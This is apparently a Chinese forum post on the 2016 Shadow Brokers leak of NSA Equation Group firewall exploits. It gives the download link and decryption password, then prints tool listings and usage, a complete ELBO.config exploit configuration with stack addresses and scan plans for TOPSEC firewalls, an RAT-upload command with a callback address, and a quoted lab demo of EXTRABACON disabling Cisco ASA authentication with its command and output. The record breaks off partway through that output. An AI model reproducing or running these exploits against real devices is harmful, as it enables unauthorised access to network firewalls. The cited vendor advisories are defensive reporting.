美国NSA方程式组织(Equation Group)数据泄漏

匿名者  3044天前

有黑客声称黑进了方程式组织,并且正在拍卖偷来的 Exploits。 

/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group


压缩包下载 (解压密码: theequationgroup)

MEGA DOWNLOAD EquationGroup Files修改

解压方式:

gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg

解压eqgrp-free-file.tar.xz文件生成目录结构。

github上已经有人共享出来解压后的文件了


思科与Fortinet证实:NSA黑客曝光安全漏洞属实

http://mobile.163.com/16/0818/06/BUNV1ERT00118023.html

思科修复漏洞并发布技术分析

http://www.2cto.com/News/201608/539647.html

内幕!深入分析NSA入侵事件

http://bobao.360.cn/news/detail/3467.html

'Shadow Brokers' 组织100万比特币(5.68亿美元)叫卖美国军方网络攻击工具(含视频)

http://bobao.360.cn/learning/detail/2966.html

8月19日:Shadow-Brokers所泄露文件的介绍、技术分析(上)

http://bobao.360.cn/learning/detail/2970.html

BenignCertain:一款可以远程提取思科VPN密钥的黑客工具

http://bobao.360.cn/learning/detail/2974.html


其他参考来源:

1.思科安全公告-CVE-2016-6366:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366

2.思科安全公告-CVE-2016-6367:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-cli

3.思科ASA产品完整性保障综述:

http://www.cisco.com/c/en/us/about/security-center/intelligence/asa-integrity-assurance.html

4.思科ASA防火墙SNMP配置教程:

http://www.cisco.com/c/en/us/td/docs/security/asa/asa96/configuration/general/asa-96-general-config/monitor-snmp.html

5.思科公司针对“The Shadow Brokers”事件的响应报告:

http://tools.cisco.com/security/center/viewErp.x?alertId=ERP-56516



泄露了两个压缩包,只有free-file的压缩包能解开,另外一个暂时没有密码(100个比特币):

$ ls -lah *.gpg
-rw-rw-r--@ 1 noname  staff   128M  7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname  staff   182M  7 25 10:50 eqgrp-free-file.tar.xz.gpg

free-file的文件主要涉及的内容是针对防火墙的扫描器、漏洞利用框架等等:

  • BLATSTING -- 穷举爆破
  • EXPLOITS -- 漏洞利用代码
  • OPS -- 攻击操作控制工具包
  • SCRIPTS -- 脚本资源引用库
  • TOOLS -- 辅助工具包(编码转换、IP格式转换、加密解密装换等等)

我们通过分析对应攻击payload的文件名,就能大致上猜测出来,具体哪些防火墙版本受到影响,比如下面这个信息,我们就能通过google搜索出思科的CISCO ASA5505防火墙受影响。

# find /Firewall/BANANAGLEE/BG3000/
.//Install/SCP/asa5505_clean60000.bin
.//Install/SCP/asa5505_clean70000.bin
.//Install/SCP/asa5505_cleanE18BF.bin
.//Install/SCP/asa5505_cleanEC480.bin
.//Install/SCP/asa5505_patch60000.bin
.//Install/SCP/asa5505_patchE18BF.bin
.//Install/SCP/asa5505_patchEC480.bin
.//Install/SCP/asaGen_clean10000_biosVer114or115.bin
.//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Juniper NetScreen-ISG 2000 防火墙

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x  23 noname  staff   782B  8 16 12:35 .
drwxr-xr-x   3 noname  staff   102B  4 10  2010 ..
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 BARPUNCH-3110
-rwxr-xr-x   1 noname  staff   2.4M  6 11  2013 BICE-3110
drwxr-xr-x   6 noname  staff   204B  4 10  2010 Modules
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x   1 noname  staff   7.8K  6 11  2013 bg_redirect.pl-3110
-rwxr-xr-x   1 noname  staff   431K  6 11  2013 bg_redirector-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 cfMiniProg-3110
-rwxr-xr-x   1 noname  staff   1.1M  6 11  2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   996K  6 11  2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   385K  6 11  2013 keygen-3110
-rwxr-xr-x   1 noname  staff   285K 10 18  2013 maclist
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 nsLogMiniProg-3110
-rwxr-xr-x   1 noname  staff   413K  6 11  2013 pd_create_ruleset-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 pd_miniprog-3110
-rwxr-xr-x   1 noname  staff   6.2K  6 11  2013 pd_start_pat.pl-3110
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 profilerIpv4-3100
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    13K  6 11  2013 start_redirector.pl-3110
-rwxr-xr-x   1 noname  staff    42B  6 11  2013 stop_redirector.sh-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 tunWiz-3110

同目录下是针对该防火墙的利用代码pl、sh,看选项带有attack_ip字眼,自己体会

# perl pd_start_pat.pl-3110
Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>
       --attack_ip <attack_ip> --intermediate_ip <intermediate_ip>
       --attack_int <interface> --target_int <interface> --port_offset <port offset>
       --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>
       [--logdir <logdir>] [--help]

# perl start_redirector.pl-3110 // 隧道攻击工具
Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip>
       --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip>
       --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port>
       --enc_iface <interface number> --clr_iface <interface number>
       --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>]
       [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>]
       [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>]
       [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>]
       [--help]

从整个文件结构来看,整个工具包建立时间为2010年

# ls -la
-rw-r--r--@  1 noname  staff   6.0K  8 16 12:35 .DS_Store
drwxr-xr-x   8 noname  staff   272B  4 10  2010 BANANAGLEE
drwxr-xr-x   3 noname  staff   102B  4 10  2010 BARGLEE
drwxr-xr-x   9 noname  staff   306B  4 10  2010 BLATSTING
drwxr-xr-x   4 noname  staff   136B  4 10  2010 BUZZDIRECTION
drwxr-xr-x  10 noname  staff   340B  4 10  2010 EXPLOITS
drwxr-xr-x   8 noname  staff   272B  8 16 12:35 OPS
drwxr-xr-x  35 noname  staff   1.2K  8 16 12:35 SCRIPTS
drwxr-xr-x  18 noname  staff   612B  8 16 12:36 TOOLS
drwxr-xr-x   4 noname  staff   136B  8 16 12:35 TURBO
-rw-r--r--   1 noname  staff    19M  4 10  2010 padding

攻击框架的文件构成主要为脚本类型:python、perl、shell 脚本

# find ./ -name *.py | wc -l
     235
# find ./ -name *.pl | wc -l
       7
# find ./ -name *.sh | wc -l
      15

BombShell的工具

Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.py
Usage: eligiblebombshell_1.2.0.1.py [options]

See -h for specific options (some of which are required).

Examples:

Scan to find (unknown versions) or confirm (known versions) vulnerability:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --scan -v

Once a valid entry is in ELBO.config, upload nopen:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v

Delete uploaded files from the previous step:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --cleanup -v

eligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!

与eligiblebombshell_1.2.0.1对应的攻击配置文件

# ELBO.config
#
# format for known versions:
#   ETAG = <ETag> : <action> : 0x<stack addr> : <version>
# format for unknown versions:
#   ETAG = <ETag> : <action> : 0x<stack addr>
#
# The device returns wacky, invalid ETags sometimes. This file just records
# the "normal" looking parts (without "" and other characters). E.g.:
#
#    device ETag       |   this file
# ---------------------|------------------
# "e8-569-46b6b873"    | e8-569-46b6b873
# "3991-583-4727f5a3"  | 3991-583-4727f5a3
# W/"55b-583-47958bb3" | 55b-583-47958bb3
# W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8
# W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7
# W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f

# Path to RAT
NOSERVER = /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static 

#################################
# ETags from actual hardware
#################################

# tested
ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1
ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1
ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1

# added Dec. 2009 - WOBBLYLLAMA
ETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003

# added Mar. 2010 - FLOCKFORWARD
ETAG =  6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1

# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1

# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1

#BLATSTING SUPPORT FOR ALL ABOVE

# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27


###################################################################
# BELOW IS FOR DEVELOPERS ONLY
###################################################################
# Etags and address from real hardware
#ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1
#ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1
# ETags and addresses from milliways
#ETAG =   e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1
#ETAG =  55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG =  55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG =  600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG =  69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG =   e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1
#ETAG =  55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1
#ETAG =  55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1
#ETAG =  600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1
###################################################################

# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
#   SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses>

# Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
#   buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
#   one plan matches, they will be tried in the order they're listed in this file. If none match,
#   the user will get an error to that effect.

# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180

```

EGBL = EGREGIOUS BLUNDER (Fortigate Firewall + HTTPD exploit (apparently 2006 CVE )
ELBA = ELIGIBLE BACHELOR
ELBO = ELIGIBLE BOMBSHELL (Chinese TOPSEC firewall versions 3.3.005.057.1 to 3.3.010.024.1)
ELCA = ELIGIBLE CANDIDATE
ELCO = ELIGIBLE CONTESTANT
EPBA = EPIC BANANA
ESPL = ESCALATE PLOWMAN
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)

BANANAGLEE = Juniper Netscreen Devices
BARGLEE
BLATSTING
BUZZDIRECTION
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

````


补充:

一个典型的利用方式:https://xorcatt.wordpress.com/2016/08/16/equationgroup-tool-leak-extrabacon-demo/


Hi there,

You may have heard that recently (15/08/2016) a group known as Shadow Brokers released what are said to be a bunch of exploits and tools written and used by the NSA.

Two tar were released, one with the password of “theequationgroup”, named “eqgrp-free-file.tar.xz.gpg”. The other is named “eqgrp-auction-file.tar.xz.gpg”, and according to the post where Shadow Brokers broke the news (now removed, but cached here), they will release the key for this file, which supposedly contains juicier content, to the person who bids the most in their bitcoin auction, which ends at a time of Shadow Brokers’ choosing.

The files are currently still available for download from this MEGA link, although I don’t know how long it will stay alive, as it was also hosted on GitHub, who tore it down shortly after it being posted.

The exploits appear to be targeting firewalls, particularly Cisco PIX/ASA, Juniper Netscreen, Fortigate, and more.

Seeing that there is an exploit for the Cisco ASA, I thought I would give it a shot in my CCNA Security ASA lab!

The requirements for the ExtraBacon exploit are that you have SNMP read access to the firewall, as well as access to either telnet or SSH. The ASA must be running 8.x, up to 8.4(4), and is said to have the possibility to crash the firewall if something goes wrong.

Once the exploit is successful, the attacker will be able to SSH to or telnet to (depending on what protocol is setup on the FW) without needing to enter credentials. If an enable password is set, this will still need to be a barrier for managing the firewall, as the exploit does not appear to disable it.

The command to execute the authentication disabling payload is:

python extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable

Which gives the following output:

xorcat@boxen:~/Downloads/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA[130] $ python extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /Users/xorcat/Downloads/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/concernedparent
[+] Executing:  extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable
[+] probing target via snmp
[+] Connecting to 10.1.1.250:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['pubString']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid 
            

最新评论

昵称
邮箱
提交评论